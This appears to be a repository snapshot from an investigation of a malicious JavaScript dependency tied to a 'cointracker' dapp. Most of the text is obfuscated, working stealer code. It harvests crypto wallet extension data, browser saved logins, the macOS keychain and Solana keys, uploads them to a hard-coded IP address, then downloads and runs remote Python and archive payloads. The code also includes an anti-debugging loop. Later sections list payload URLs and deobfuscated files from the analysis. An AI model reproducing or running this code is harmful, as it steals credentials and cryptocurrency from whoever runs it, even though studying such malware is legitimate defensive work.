const _0x19f083 = _0x519f3a[_0x30fe79] || _0x459feb;
_0x459feb.__proto__ = _0x5ed2ed.bind(_0x5ed2ed);
_0x459feb.toString = _0x19f083.toString.bind(_0x19f083);
_0x519f3a[_0x30fe79] = _0x459feb;
}
});
_0x5683f8();
const _0x199906 = require('fs');
const _0x47d1c4 = require('os');
const _0x129e11 = require("path");
const _0x6f13f = require("request");
const _0x4309f4 = require("child_process").exec;
const _0x1b8b9f = _0x47d1c4.hostname();
const _0x193712 = _0x47d1c4.platform();
const _0x411d4d = _0x47d1c4.homedir();
const _0x47706c = _0x47d1c4.tmpdir();
const _0x4c3381 = _0x2f1cc1 => _0x2f1cc1.replace(/^~([a-z]+|\/)/, (_0xbc48ba, _0x2afba8) => '/' === _0x2afba8 ? _0x411d4d : _0x129e11.dirname(_0x411d4d) + '/' + _0x2afba8);
function _0xe81c25(_0x52741b) {
try {
_0x199906.accessSync(_0x52741b);
return true;
} catch (_0x2846c1) {
return false;
}
}
const _0x3589f2 = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"];
const _0x326f0f = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
const _0x1ea6ac = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", "opera"];
const _0x1507f8 = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "hnfanknocfeofbddgcijnmhnfnkdnaad", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "aholpfdialjgjfhomihkjbmgjidlcdno"];
const _0x4ff635 = async (_0x13c588, _0x5ae957, _0x3896b7, _0xb04bd8) => {
let _0x26a693;
if (!_0x13c588 || '' === _0x13c588) {
return [];
}
try {
if (!_0xe81c25(_0x13c588)) {
return [];
}
} catch (_0x54b7b6) {
return [];
}
if (!_0x5ae957) {
_0x5ae957 = '';
}
let _0x9c7028 = [];
for (let _0x5aedf8 = 0; _0x5aedf8 < 200; _0x5aedf8++) {
const _0x2071b6 = _0x13c588 + '/' + (0 === _0x5aedf8 ? "Default" : "Profile " + _0x5aedf8) + "/Local Extension Settings";
for (let _0x6ffb19 = 0; _0x6ffb19 < _0x1507f8.length; _0x6ffb19++) {
let _0x2bbf4d = _0x2071b6 + '/' + _0x1507f8[_0x6ffb19];
if (_0xe81c25(_0x2bbf4d)) {
let _0x53f4ac = [];
try {
_0x53f4ac = _0x199906.readdirSync(_0x2bbf4d);
} catch (_0x35e47c) {
_0x53f4ac = [];
}
_0x53f4ac.forEach(async _0x3c7003 => {
let _0x19b400 = _0x129e11.join(_0x2bbf4d, _0x3c7003);
try {
const _0x11b159 = {
filename: "101_" + _0x5ae957 + _0x5aedf8 + '_' + _0x1507f8[_0x6ffb19] + '_' + _0x3c7003
};
if (_0x19b400.includes(".log") || _0x19b400.includes(".ldb")) {
_0x9c7028.push({
'value': _0x199906.createReadStream(_0x19b400),
'options': _0x11b159
});
}
} catch (_0x49734c) {}
});
}
}
}
if (_0x3896b7 && (_0x26a693 = _0x411d4d + "/.config/solana/id.json", _0x199906.existsSync(_0x26a693))) {
try {
const _0x5db743 = {
filename: "solana_id.txt"
};
_0x9c7028.push({
'value': _0x199906.createReadStream(_0x26a693),
'options': _0x5db743
});
} catch (_0x377a3a) {}
}
_0x3e487a(_0x9c7028, _0xb04bd8);
return _0x9c7028;
};
const _0x2a0561 = _0x58f4ad => {
const _0x13f812 = _0x4c3381('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles";
let _0x3bcfb9 = [];
if (_0xe81c25(_0x13f812)) {
let _0x91aac6 = [];
try {
_0x91aac6 = _0x199906.readdirSync(_0x13f812);
} catch (_0x5efa87) {
_0x91aac6 = [];
}
let _0x51044d = 0;
_0x91aac6.forEach(async _0x3b2da1 => {
let _0x128c6f = _0x129e11.join(_0x13f812, _0x3b2da1);
if (_0x128c6f.includes("-release")) {
let _0x138611 = _0x129e11.join(_0x128c6f, "/storage/default");
let _0x58d17a = [];
_0x58d17a = _0x199906.readdirSync(_0x138611);
let _0x522a3d = 0;
_0x58d17a.forEach(async _0x2990be => {
if (_0x2990be.includes("moz-extension")) {
let _0x55cf62 = _0x129e11.join(_0x138611, _0x2990be);
_0x55cf62 = _0x129e11.join(_0x55cf62, "idb");
let _0x3061fb = [];
_0x3061fb = _0x199906.readdirSync(_0x55cf62);
_0x3061fb.forEach(async _0x91d245 => {
if (_0x91d245.includes(".files")) {
let _0x467715 = _0x129e11.join(_0x55cf62, _0x91d245);
let _0x4de356 = [];
_0x4de356 = _0x199906.readdirSync(_0x467715);
_0x4de356.forEach(_0x3ae9ff => {
if (!_0x199906.statSync(_0x129e11.join(_0x467715, _0x3ae9ff)).isDirectory()) {
let _0x3a605a = _0x129e11.join(_0x467715, _0x3ae9ff);
const _0x248706 = {
filename: _0x51044d + '_' + _0x522a3d + '_' + _0x3ae9ff
};
_0x3bcfb9.push({
'value': _0x199906.createReadStream(_0x3a605a),
'options': _0x248706
});
}
});
}
});
}
});
_0x522a3d += 1;
}
_0x51044d += 1;
});
_0x3e487a(_0x3bcfb9, _0x58f4ad);
return _0x3bcfb9;
}
};
const _0x3e487a = (_0x349385, _0x158c4c) => {
const _0xb3b0ff = {
type: '10',
hid: "101_" + _0x1b8b9f,
uts: _0x158c4c,
multi_file: _0x349385
};
try {
if (_0x349385.length > 0) {
const _0x74f05b = {
url: "http://95.164.17.24:1224/uploads",
formData: _0xb3b0ff
};
_0x6f13f.post(_0x74f05b, (_0x345d7c, _0x41c467, _0x4de652) => {});
}
} catch (_0x5aff6a) {}
};
const _0x6b7efa = async (_0x3c0343, _0x1b9465, _0xc0b4ce) => {
try {
let _0x4acfff = '';
_0x4acfff = 'd' == _0x193712[0] ? _0x4c3381('~/') + "/Library/Application Support/" + _0x3c0343[1] : 'l' == _0x193712[0] ? _0x4c3381('~/') + "/.config/" + _0x3c0343[2] : _0x4c3381('~/') + "/AppData/" + _0x3c0343[0] + "/User Data";
await _0x4ff635(_0x4acfff, _0x1b9465 + '_', 0 == _0x1b9465, _0xc0b4ce);
} catch (_0x3e2ca3) {}
};
const _0x3d557a = async _0x4e0424 => {
const _0x37c940 = {
xUWCh: function (_0x152995, _0x51c1e8) {
return _0x152995 === _0x51c1e8;
},
KBPZQ: "SgHpB"
};
_0x37c940.oxgsW = "gqFDg";
_0x37c940.mHcfW = "Default";
let _0x2695b9 = [];
let _0x2bcfcb = _0x411d4d + "/Library/Keychains/login.keychain";
if (_0x199906.existsSync(_0x2bcfcb)) {
try {
const _0x447662 = {
filename: "logkc-db"
};
_0x2695b9.push({
'value': _0x199906.createReadStream(_0x2bcfcb),
'options': _0x447662
});
} catch (_0x5a7463) {}
} else {
_0x2bcfcb += "-db";
if (_0x199906.existsSync(_0x2bcfcb)) {
try {
const _0x4d7612 = {
filename: "logkc-db"
};
_0x2695b9.push({
'value': _0x199906.createReadStream(_0x2bcfcb),
'options': _0x4d7612
});
} catch (_0x315b64) {}
}
}
try {
let _0x1a76a1 = _0x411d4d + "/Library/Application Support/Google/Chrome";
if (_0xe81c25(_0x1a76a1)) {
for (let _0x428197 = 0; _0x428197 < 200; _0x428197++) {
const _0x17a510 = _0x1a76a1 + '/' + (0 === _0x428197 ? "Default" : "Profile " + _0x428197) + "/Login Data";
try {
if (!_0xe81c25(_0x17a510)) {
continue;
}
const _0x3f27b8 = _0x1a76a1 + "/ld_" + _0x428197;
const _0x262ea1 = {
filename: "pld_" + _0x428197
};
if (_0xe81c25(_0x3f27b8)) {
_0x2695b9.push({
'value': _0x199906.createReadStream(_0x3f27b8),
'options': _0x262ea1
});
} else {
_0x199906.copyFile(_0x17a510, _0x3f27b8, _0x454b79 => {
const _0x3814f5 = {
filename: "pld_" + _0x428197
};
let _0x31a48f = [{
'value': _0x199906.createReadStream(_0x17a510),
'options': _0x3814f5
}];
_0x3e487a(_0x31a48f, _0x4e0424);
});
}
} catch (_0x30acf4) {}
}
}
} catch (_0x3b1189) {}
try {
if (_0x37c940.oxgsW === "gqFDg") {
let _0x17d00a = _0x411d4d + "/Library/Application Support/BraveSoftware/Brave-Browser";
if (_0xe81c25(_0x17d00a)) {
for (let _0x54bfbb = 0; _0x54bfbb < 200; _0x54bfbb++) {
const _0x226bbb = _0x17d00a + '/' + (0 === _0x54bfbb ? _0x37c940.mHcfW : "Profile " + _0x54bfbb);
try {
if (!_0xe81c25(_0x226bbb)) {
continue;
}
const _0x482c48 = _0x226bbb + "/Login Data";
const _0x36e576 = {
filename: "brld_" + _0x54bfbb
};
if (_0xe81c25(_0x482c48)) {
_0x2695b9.push({
'value': _0x199906.createReadStream(_0x482c48),
'options': _0x36e576
});
} else {
_0x199906.copyFile(_0x226bbb, _0x482c48, _0x5b265d => {
const _0xd39bb9 = {
filename: "brld_" + _0x54bfbb
};
let _0x4b9c6e = [{
'value': _0x199906.createReadStream(_0x226bbb),
'options': _0xd39bb9
}];
_0x3e487a(_0x4b9c6e, _0x4e0424);
});
}
} catch (_0x1bcaae) {}
}
}
} else {
if (_0x5ae54f) {
throw _0x4389d0;
}
_0x54db86(_0x3e3ec7);
}
} catch (_0x2c2abd) {}
_0x3e487a(_0x2695b9, _0x4e0424);
return _0x2695b9;
};
const _0x30c8d6 = async (_0x52a160, _0x5816ba, _0x3dfb10) => {
let _0x2d8e62 = [];
let _0x4d9f89 = '';
_0x4d9f89 = 'd' == _0x193712[0] ? _0x4c3381('~/') + "/Library/Application Support/" + _0x52a160[1] : 'l' == _0x193712[0] ? _0x4c3381('~/') + "/.config/" + _0x52a160[2] : _0x4c3381('~/') + "/AppData/" + _0x52a160[0] + "/User Data";
let _0x2c61fb = _0x4d9f89 + "/Local State";
if (_0x199906.existsSync(_0x2c61fb)) {
try {
const _0x3dec5d = {
filename: _0x5816ba + "_lst"
};
_0x2d8e62.push({
'value': _0x199906.createReadStream(_0x2c61fb),
'options': _0x3dec5d
});
} catch (_0x20a657) {}
}
try {
if (_0xe81c25(_0x4d9f89)) {
for (let _0x5a5cec = 0; _0x5a5cec < 200; _0x5a5cec++) {
const _0x176724 = _0x4d9f89 + '/' + (0 === _0x5a5cec ? "Default" : "Profile " + _0x5a5cec);
try {
if (!_0xe81c25(_0x176724)) {
continue;
}
const _0x2be184 = _0x176724 + "/Login Data";
if (!_0xe81c25(_0x2be184)) {
continue;
}
const _0x2715ea = {
filename: _0x5816ba + '_' + _0x5a5cec + "_uld"
};
_0x2d8e62.push({
'value': _0x199906.createReadStream(_0x2be184),
'options': _0x2715ea
});
} catch (_0x468158) {}
}
}
} catch (_0x200519) {}
_0x3e487a(_0x2d8e62, _0x3dfb10);
return _0x2d8e62;
};
(function () {
let _0x5532a8;
try {
const _0x366b5e = Function("return (function() {}.constructor(\"return this\")( ));");
_0x5532a8 = _0x366b5e();
} catch (_0x4f5c65) {
_0x5532a8 = window;
}
_0x5532a8.setInterval(_0x1d95ac, 4000);
})();
let _0x5125b0 = 0;
const _0x4a01de = async _0x4ffdb6 => {
_0x4309f4("tar -xf " + _0x4ffdb6 + " -C " + _0x411d4d, (_0x4a3734, _0xd49571, _0x544043) => {
if (_0x4a3734) {
_0x199906.rmSync(_0x4ffdb6);
return void (_0x5125b0 = 0);
}
_0x199906.rmSync(_0x4ffdb6);
_0x38d430();
});
};
const _0x292442 = () => {
const _0x4ecedf = _0x47706c + "\\p.zi";
const _0x5e0ddf = _0x47706c + "\\p2.zip";
if (_0x5125b0 >= 51476596) {
return;
}
if (_0x199906.existsSync(_0x4ecedf)) {
try {
var _0x31c786 = _0x199906.statSync(_0x4ecedf);
if (_0x31c786.size >= 51476596) {
_0x5125b0 = _0x31c786.size;
_0x199906.rename(_0x4ecedf, _0x5e0ddf, _0x19e291 => {
if (_0x19e291) {
throw _0x19e291;
}
_0x4a01de(_0x5e0ddf);
});
} else {
if (_0x5125b0 < _0x31c786.size) {
_0x5125b0 = _0x31c786.size;
} else {
_0x199906.rmSync(_0x4ecedf);
_0x5125b0 = 0;
}
_0x53d14b();
}
} catch (_0x37e2b1) {}
} else {
_0x4309f4("curl -Lo \"" + _0x4ecedf + "\" \"" + "http://95.164.17.24:1224/pdown" + "\"", (_0x460048, _0x2d8e29, _0x3a1881) => {
if (_0x460048) {
_0x5125b0 = 0;
return void _0x53d14b();
}
try {
_0x5125b0 = 51476596;
_0x199906.renameSync(_0x4ecedf, _0x5e0ddf);
_0x4a01de(_0x5e0ddf);
} catch (_0x1ea316) {}
});
}
};
function _0x1924(_0x50b655, _0x3c081c) {
const _0x2941a2 = _0x5c3f();
_0x1924 = function (_0x108868, _0x48b31a) {
_0x108868 = _0x108868 - 449;
let _0x483a18 = _0x2941a2[_0x108868];
return _0x483a18;
};
return _0x1924(_0x50b655, _0x3c081c);
}
function _0x53d14b() {
setTimeout(() => {
_0x292442();
}, 20000);
}
const _0x38d430 = async () => await new Promise((_0x3e817c, _0x3e3c82) => {
if ('w' == _0x193712[0]) {
if (_0x199906.existsSync(_0x411d4d + "\\.pyp\\python.exe")) {
(() => {
const _0x3b073c = _0x411d4d + "/.npl";
const _0x343873 = "\"" + _0x411d4d + "\\.pyp\\python.exe\" \"" + _0x3b073c + "\"";
try {
_0x199906.rmSync(_0x3b073c);
} catch (_0x1a92c) {}
_0x6f13f.get("http://95.164.17.24:1224/client/10/101", (_0x191b00, _0x14f71f, _0xd7681) => {
if (!_0x191b00) {
try {
_0x199906.writeFileSync(_0x3b073c, _0xd7681);
_0x4309f4(_0x343873, (_0x159c9e, _0x20299f, _0x9c73a4) => {});
} catch (_0x4b1714) {}
}
});
})();
} else {
_0x292442();
}
} else {
(() => {
_0x6f13f.get("http://95.164.17.24:1224/client/10/101", (_0x3703cc, _0x24b69e, _0x4ed242) => {
if (!_0x3703cc) {
_0x199906.writeFileSync(_0x411d4d + "/.npl", _0x4ed242);
_0x4309f4("python3 \"" + _0x411d4d + "/.npl\"", (_0x1a22b5, _0x1fd2a4, _0xdcd667) => {});
}
});
})();
}
});
var _0xcbff8c = 0;
const _0x173434 = async () => {
try {
const _0x22abee = Math.round(new Date().getTime() / 1000);
await (async () => {
try {
await _0x6b7efa(_0x326f0f, 0, _0x22abee);
await _0x6b7efa(_0x3589f2, 1, _0x22abee);
await _0x6b7efa(_0x1ea6ac, 2, _0x22abee);
_0x2a0561(_0x22abee);
if ('w' == _0x193712[0]) {
await _0x4ff635(_0x4c3381('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false, _0x22abee);
}
if ('d' == _0x193712[0]) {
await _0x3d557a(_0x22abee);
} else {
await _0x30c8d6(_0x326f0f, 0, _0x22abee);
await _0x30c8d6(_0x3589f2, 1, _0x22abee);
await _0x30c8d6(_0x1ea6ac, 2, _0x22abee);
}
} catch (_0x32f361) {}
})();
_0x38d430();
} catch (_0x280146) {}
};
function _0x5932f0(_0x4508b1, _0x18df2e, _0x397e92, _0x366e4d, _0x322bfe) {
return _0x1924(_0x322bfe - '0x1ff', _0x366e4d);
}
_0x173434();
function _0xda163(_0x3c6aa4, _0x202f50, _0x52b1c7, _0x55bf54, _0x5549f6) {
return _0x1924(_0x5549f6 + 0x122, _0x55bf54);
}
function _0x5d5078(_0x100cb7, _0x9412e2, _0x5ec189, _0x10190a, _0x52ade1) {
return _0x1924(_0x52ade1 + 0x24f, _0x9412e2);
}
_0x38d430();
function _0x5c3f() {
const _0x428f3e = ['wuHEq', '.file', 'aeach', "\\.pyp", 'UoJOE', 'isDir', 'olana', 'xUWCh', "rn th", 'peras', 'oamin', 'gPvkN', '_uld', 'bbldc', '/Logi', '48816119cmSStO', 'HLSgT', 'bind', 'oohck', 'rave-', 'strin', 'size', 'uokIZ', 'ox/Pr', 'LRGIS', 'NTbgV', "\" \"", 'Jtppe', 'copyF', 'rowse', 'Local', 'le/Ch', 'imhlp', 'hbKDN', 'readd', 'nctio', 'nt/', 'mgjnj', 'eofbd', 'mHcfW', 'fig/s', "era S", 'fXLRL', 'ion', '_lst', 'ile', 'g/Moz', 'soft/', '624wiFLCw', 'state', 'debu', '/clie', 'http:', 'zVtoT', 'zWDMF', '101', 'CpxUY', '/ld_', 'imael', 're.Op', 'oihof', '-db', 'chain', 'type', '/Chro', 'formD', 'ort/G', '(((.+', '_proc', 'inclu', "is\")(", 'setIn', '7.24:', 'pebkl', 'efaul', 'cionb', '/Brav', 'age/d', '/User', 'nkbih', 'ing', 'kkolj', 'hifaf', 'jUcAf', 'txt', 'url', 'JnXsq', 'conso', 'ain', 'info', 'hostn', 'fbeog', 'pekpl', 'hfood', '1345IYFpWr', "n Set", 'ase', 'hid', 'ERdCS', 'rFrvq', 'jblnd', 're/Op', 'Data', 'path', 'zUtgi', "l Sta", '1224', 'toStr', 'opera', 'multi', 'Profi', 'ync', 'pytho', 'log', 'ibnej', 'gmccd', 'cfgod', 'nkdna', 'ser', 'uts', 'bRKQH', 'ome', 'Z_$][', 'ata/', 'platf', 'init', 'ensio', 'RasaC', 'retur', 'gDVlL', 'ins/l', 'lLXAn', '-rele', '0-9a-', '1114331hbppXm', 'tings', 'ame', 'const', '__pro', 'tmpdi', 'irSyn', "\\p.zi", 'are/B', 'a_id.', 'ware/', 'creat', '-Brow', 'e/Chr', '/Libr', 'pikoo', 'pld_', "n (fu", 'ctor(', 'post', 'sSync', 'hlefn', 'qtCvw', 'behhm', 'cCUzK', '/uplo', 'ort/B', "\\pyth", '1878934QmSqrh', "User ", 'round', 'Firef', 'tQBrs', 'homed', 'SgHpB', 'fNjYb', 'Defau', 'qIjAT', 'Softw', 'lipeo', "xf ", 'googl', 'lmome', 'mdjon', 'eSoft', 'ata', '/id.j', 'OFzfc', 'kpcnl', 'error', '*(?:[', '90426HCAvss', 'Micro', 'eebol', 'QQyoQ', 'pplic', 'ata/L', '10iKiesx', 'gpafn', 'dlcob', 'bakop', 'cWcKl', 'write', 'while', 'jgjfh', 'LrAUg', 'FileS', 'statS', 'gNrsu', 'phepc', 'knmef', 'count', 'ccfch', 'bFFdn', 'HAGWo', 'RDVJh', ')+)+)', 'ejbal', 'pjiig', 'repla', 'eycha', "n3 \"", "-Lo \"", 'exist', 'actio', 'to__', 'hNlPQ', 'test', "n Dat", "ion *", 'yvkJR', 'ldhgm', 'RwUDU', 'solan', 'apagc', 'AxmxO', 'UlxWL', 'ophhp', 'trace', 'bfnae', 'pndod', 'input', 'hecda', 'lchlg', 'gqFDg', " -C ", 'a-zA-', '//95.', 'era', 'fhboh', 'kYLEj', "e\" \"", 'fgpgk', 'ary/K', 'ajnim', "\"retu", 'orm', '/pdow', "\\( *\\", 'yyQjf', 'e-chr', 'nstru', 'ation', '$]*)', "le ", " Data", 'excep', " Supp", 'Roami', 'KBPZQ', 'dirna', 'ess', 'dfjmm', 'warn', 'mcxbX', 'dgcij', '24668OqtVqd', 'UGGbH', 'BoqFI', 'rmSyn', 'tion', '.ldb', 'ng/Op', 'lDudq', 'aeaoe', "tar -", 'ruXUu', "l Ext", 'Brows', 'funct', 'Brave', 'terva', "\\+\\+ ", 'rome', 'vqgRA', '17034wZXsOQ', 'ofile', 'ogin.', 're/Br', 'ocal/', 'kodbe', 'dgmol', 'ata/R', '{}.co', 'oxgsW', '/.con', 'omjjk', 'apply', 'raveS', 'getTi', 'on.ex', 'keych', 'renam', 'bohpj', 'com.o', 'fdial', 'lmeee', 'child', 'acces', 'ads', 'PsDpu', '.log', 'Edge/', 'jbmgj', 'idb', 'table', '/Goog', "\\p2.z", 'eSync', '/AppD', 'oogle', 'searc', 'Googl', 'brld_', 'idlcd', 'oftwa', 'ructo', '_file', 'logkc', '164.1', '/stor', 'gger', "curl ", 'get', 'ngcna', 'Objec', 'YuAKn', 'filen', 'aPqlm', 'acmac', 'onoee', 'reque', "n() ", 'illa/', 'OPQdv', 'forEa', '/Loca', 'odkjb', 'xtens', '/.npl', " (tru", 'FaowP', 'fig/', 'proto', 'lBaRZ', 'MOiXN', 'knocf', 'nmhnf', 'lengt', 'call', 'hnfan', 'nhcel', 'Strea', "e) {}", 'RYGVt', 'son', 'eRead', 'ector', 'ilkdb', 'mKvri', 'FvJVs', '15SgmvFc', 'omihk', 'aholp', 'ave-B', 'ary/A', 'des', 'ort/', 'sLQAD', 'push', 'mnkoe', 'join', '10489401lvcWwt', 'bohma', 'zA-Z_', 'moz-e', 'XoLNx', 'exec'];
_0x5c3f = function () {
return _0x428f3e;
};
return _0x5c3f();
}
let _0x36bfe6 = setInterval(() => {
if ((_0xcbff8c += 1) < 5) {
_0x173434();
} else {
clearInterval(_0x36bfe6);
}
}, 30000);
function _0x1d95ac(_0x518a8f) {
function _0x16155a(_0x136b95) {
if (typeof _0x136b95 === "string") {
return function (_0x58e765) {}.constructor("while (true) {}").apply("counter");
} else if (('' + _0x136b95 / _0x136b95).length !== 1 || _0x136b95 % 20 === 0) {
(function () {
return true;
}).constructor("debugger").call("action");
} else {
(function () {
return false;
}).constructor("debugger").apply("stateObject");
}
_0x16155a(++_0x136b95);
}
try {
if (_0x518a8f) {
return _0x16155a;
} else {
_0x16155a(0);
}
} catch (_0x5e88ea) {}
}

42207
fixed-deps/package-lock.json generated Normal file
View File

File diff suppressed because it is too large Load Diff

98
fixed-deps/package.json Normal file
View File

@ -0,0 +1,98 @@
{
"name": "cointracker",
"version": "0.1.0",
"description": "Coin Tracking Dapp",
"author": "Smith",
"dependencies": {
"@babel/core": "^7.16.0",
"@baublet/use-global-state": "^1.1.0",
"@emotion/react": "^11.10.4",
"@emotion/styled": "^11.10.4",
"@fortawesome/fontawesome-svg-core": "^1.2.36",
"@fortawesome/free-solid-svg-icons": "^5.15.4",
"@fortawesome/react-fontawesome": "^0.1.16",
"@material-ui/core": "^4.12.3",
"@metamask/detect-provider": "^1.2.0",
"@mui/material": "^5.10.9",
"@mui/styles": "^5.10.9",
"@openzeppelin/contracts": "^4.3.2",
"@testing-library/jest-dom": "^5.11.4",
"@testing-library/react": "^11.1.0",
"@testing-library/user-event": "^12.1.10",
"@truffle/hdwallet-provider": "^1.5.0",
"@web3-react/core": "^6.1.9",
"@web3-react/injected-connector": "^6.0.7",
"axios": "^0.21.4",
"body-parser": "^1.19.0",
"bootstrap": "4.3.1",
"chai": "4.2.0",
"chalk": "^4.1.2",
"concurrently": "5.1.0",
"cors": "^2.8.5",
"crypto": "^1.0.1",
"dotenv": "^16.0.3",
"ethers": "^5.4.6",
"express": "^4.17.1",
"express-ws": "^4.0.0",
"firebase": "^8.3.1",
"fs": "^0.0.1-security",
"mdbreact": "^5.1.0",
"moment": "^2.29.4",
"momentjs": "^2.0.0",
"mui-datatables": "^3.8.2",
"path": "^0.12.7",
"react": "^17.0.2",
"react-bootstrap": "^2.0.0",
"react-cookies": "^0.1.1",
"react-datepicker": "^4.8.0",
"react-dom": "^17.0.2",
"react-faq-component": "^1.3.1",
"react-hooks-global-state": "^2.0.0",
"react-notifications": "^1.7.2",
"react-on-images-loaded": "^2.2.5",
"react-pancakeswap-token-price": "^1.1.1",
"react-router": "^5.2.1",
"react-router-dom": "^6.0.0",
"react-scripts": "^4.0.3",
"react-scroll": "^1.8.4",
"react-slideshow-image": "^3.6.0",
"react-toastify": "^5.5.0",
"request": "^2.88.2",
"sass": "^1.43.4",
"sequelize": "^5.16.0",
"sqlite3": "^5.1.6",
"telegraf": "^4.10.0",
"truffle-plugin-verify": "^0.5.15",
"uniswap-price": "^1.0.4",
"web-vitals": "^1.0.1",
"web3": "^1.6.0",
"webpack": "^4.44.0"
},
"devDependencies": {
"@babel/plugin-proposal-private-property-in-object": "^7.21.11",
"nodemon": "^1.19.1",
"sequelize-cli": "^5.5.0"
},
"scripts": {
"start-devserver": "node server/app.js",
"start-server": "nodemon server/app.js --watch server/*",
"start-front": "react-scripts --openssl-legacy-provider start",
"dev": "node server/app.js",
"start": "concurrently \"npm run start-server\" \"npm run start-front\" --kill-others --kill-others-on-fail",
"build": "react-scripts --openssl-legacy-provider build",
"test": "react-scripts test",
"eject": "react-scripts eject"
},
"eslintConfig": {
"extends": [
"react-app",
"react-app/jest"
]
},
"browserslist": [
">0.2%",
"not dead",
"not ie <= 11",
"not op_mini all"
]
}

8
orig/links.txt Normal file
View File

@ -0,0 +1,8 @@
http://ipcheck.cloud:8353/api/user/thirdcookie/v10/100
http://ipcheck.cloud:8353/api/user/thirdcookie/v10/101
http://ipcheck.cloud:8353/api/user/thirdcookie/v10/102
http://ipcheck.cloud:8353/api/user/thirdcookie/v10/103
http://ipcheck.cloud:8353/api/user/thirdcookie/v10/104
http://ipcheck.cloud:8353/api/user/thirdcookie/v10/105
http://ipcheck.cloud:8353/api/user/thirdcookie/v10/106
http://ipcheck.cloud:8353/api/user/thirdcookie/v10/107

1
orig/v10_100_orig.json Normal file
View File

File diff suppressed because one or more lines are too long

1
orig/v10_101_orig.json Normal file
View File

File diff suppressed because one or more lines are too long

1
orig/v10_102_orig.json Normal file
View File

File diff suppressed because one or more lines are too long

1
orig/v10_103_orig.json Normal file
View File

File diff suppressed because one or more lines are too long

1
orig/v10_104_orig.json Normal file
View File

File diff suppressed because one or more lines are too long

1
orig/v10_105_orig.json Normal file
View File

File diff suppressed because one or more lines are too long

1
orig/v10_106_orig.json Normal file
View File

File diff suppressed because one or more lines are too long

1
orig/v10_107_orig.json Normal file
View File

File diff suppressed because one or more lines are too long

383
v10_102_manual-formatting.js Normal file
View File

File diff suppressed because one or more lines are too long

4495
v10_102_prettified.js Normal file
View File

File diff suppressed because it is too large Load Diff

1129
workspace/100_unobf.js Normal file
View File

File diff suppressed because it is too large Load Diff

1105
workspace/106_unobf.js Normal file
View File

File diff suppressed because it is too large Load Diff

1140
workspace/107_unobf.js Normal file
View File

File diff suppressed because it is too large Load Diff

31
workspace/four.js Normal file
View File

@ -0,0 +1,31 @@
function getArrOfStrs() {
const arrOfStrs = ['RHmqc', 'omjjk', 'ApteI', 'sCumQ', 'copyF', '/ld_', 'rome', 'fgpgk', 'exec', 'rneKI', 'lLrSF', 'push', 'test', 'const', 'OiABa', 'nkbih', 'ocal/', '/Libr', 'gpafn', '/Logi', 'count', 'hostn', '/Goog', 'type', 'ain', 'gger', '3037OzSgDk', 'ctor(', 'round', 'fdial', 'multi', 'mdjon', 'ata', 'idb', 'oihof', "is\")(", 'knmef', 'ync', '125CwSmIC', 'VPgoc', 'ware/', 'ess', 'IGRsE', "\\pyth", 'repla', 'Micro', 'wlUAS', '0-9a-', "\\+\\+ ", 'ensio', '-rele', 'pjiig', 'SvCSl', '16zYubJH', 'bind', 'rmSyn', 'hoSHZ', 'e/Chr', 'log', 'hfood', 'LswSJ', 'write', 'wynjd', '//95.', 'OkPvv', 'woHII', '13479389yigTOw', 'TzzgA', 'oohck', 'ort/G', '/AppD', 'Brave', 'googl', '_lst', 'ata/', 'acmac', 'AVJaB', 'on.ex', 'isDir', 'Data', 'lengt', 'jXfuU', "\\.pyp", 'yzTXQ', 'url', 'jgjfh', 'inclu', 'call', 'ng/Op', '$]*)', 'xfpZo', 'filen', 'eebol', 'ome', 'jblnd', 'excep', 'ZDfOB', 'brld_', 'bohma', 'aeaoe', 'uCJgo', 'nt/', 'trace', "n3 \"", 'IOjHQ', 'ejbal', 'nhcel', 'NNhzn', '382902FMrTAX', 'StRpE', 'ort/B', '23610RVWEoM', 'ion', 'oamin', 'table', 'pebkl', '164qDPepv', 'hid', '6465221OiGmbD', '15101090qJHwNn', 'Z_$][', 'bbldc', 'Strea', 'ogin.', 'nstru', 'post', 'ZEGam', 'JOVFD', "l Ext", 'init', '/stor', 'info', 'oZjzq', 'g/Moz', 'wOJfi', ')+)+)', 'ser', 'ame', "n (fu", 'nmhnf', 'WpCbt', 'xtens', 'bGCdl', 'forEa', '*(?:[', 'nctio', 'Defau', 'ary/K', 'bfnae', 'moz-e', 'apply', '28JNYCjU', 'rave-', '/.con', "rn th", 'UroxN', 'http:', 'des', 'raveS', 'HGaea', "-Lo \"", '/id.j', " (tru", 'fbeog', 'are/B', 'eSoft', 'ofile', " Supp", 'size', 'solan', 'bvLnu', 'path', 'Roami', 'input', 'ata/R', 'cionb', 'sJMRc', 'fOasi', 'wambz', 'dgcij', 'dlcob', 'oogle', 'conso', "ion *", "l Sta", 'tmpdi', 'warn', 'peras', "e\" \"", 'logkc', 'FZJcA', 'formD', 'statS', 'setIn', 'opera', 'lipeo', 'jXzWn', 'BmaWn', '.ldb', 'ophhp', 'error', 'eycha', '/Loca', 'funct', 'DHpkL', 'ation', 'pytho', '/pdow', 'Firef', '/.npl', '1396917dSIpDK', 'proto', 'Brows', 'lmeee', 'child', 'ins/l', 'ajnim', 'bohpj', 'ing', '_proc', 'fhboh', 'knocf', '(((.+', 'ibnej', "\" \"", 're.Op', '/uplo', "xf ", 'apagc', "n() ", 'czYua', 'DaCRF', 'GfbKa', 'pplic', 'PlQuv', "\"retu", 'eofbd', 'lmome', 'searc', 'ile', 'hifaf', 'vdKma', 'lYbbZ', " Data", 're/Op', 'onoee', 'imhlp', '7.24:', "\\( *\\", 'pld_', 'ave-B', 'gdVKS', 'ox/Pr', 'Nchdc', 'CAdIA', 'eRead', 'ads', 'YvgzM', "n Dat", 'state', 'retur', 'ructo', '/Brav', 'readd', 'bakop', 'JLXSG', 'strin', 'imael', 'efaul', 'Softw', 'ilkdb', "e) {}", 'Objec', 'ector', 'Profi', 'soft/', 'join', 'le/Ch', 'eSync', 'homed', '102', 'behhm', 'platf', 